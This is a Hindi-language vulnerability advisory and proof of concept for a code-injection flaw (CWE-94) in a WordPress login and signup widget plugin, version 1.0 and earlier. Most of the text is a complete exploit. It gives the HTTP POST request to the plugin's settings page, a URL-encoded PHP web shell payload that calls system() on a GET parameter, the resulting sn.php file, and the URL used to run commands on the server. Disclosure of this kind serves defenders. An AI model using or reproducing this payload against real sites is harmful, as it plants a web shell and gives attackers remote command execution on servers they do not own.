
WordPress Custom Login And Signup Widget Plugin <= 1.0 मनमाना कोड निष्पादन के लिए संवेदनशील है।
कोड के उत्पादन का अनुचित नियंत्रण ('कोड इंजेक्शन') कमजोरी bitto.Kazi Custom Login And Signup Widget में प्रमाणित एडमिन उपयोगकर्ताओं द्वारा मनमाना PHP कोड निष्पादन की अनुमति देती है।
यह समस्या संस्करण 1.0 तक के सभी संस्करणों को प्रभावित करती है।
🔥 बेस स्कोर: 9.1 (गंभीर)
CWE ID: CWE-94 – कोड के उत्पादन का अनुचित नियंत्रण ('कोड इंजेक्शन')
यह प्लगइन एडमिनिस्ट्रेटरों को सेटिंग्स पेज पर Sender’s Name फ़ील्ड के माध्यम से sn.php की सामग्री को संशोधित करने की अनुमति देता है।
उपयोगकर्ता द्वारा दिया गया इनपुट बिना किसी सैनिटाइज़ेशन या सत्यापन के सीधे PHP फ़ाइल में लिखा जाता है।
परिणामस्वरूप, text पैरामीटर में प्रदान किया गया कोई भी PHP कोड एक PHP फ़ाइल में संग्रहीत हो जाता है और सीधे अनुरोध पर निष्पादित होता है, जिससे रिमोट कोड निष्पादन (RCE) होता है।
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
textsn.php (प्लगइन कॉन्फ़िग शामिल)<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
सफल इंजेक्शन के बाद, कमांड निष्पादित करने के लिए सीधे इस पर पहुँचें:
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id
.php फ़ाइलों में लिखने न दें।यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए बनाया गया है।
प्रदान की गई जानकारी का कोई भी उपयोग आपके अपने जोखिम पर है।
लेखक इस सामग्री के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।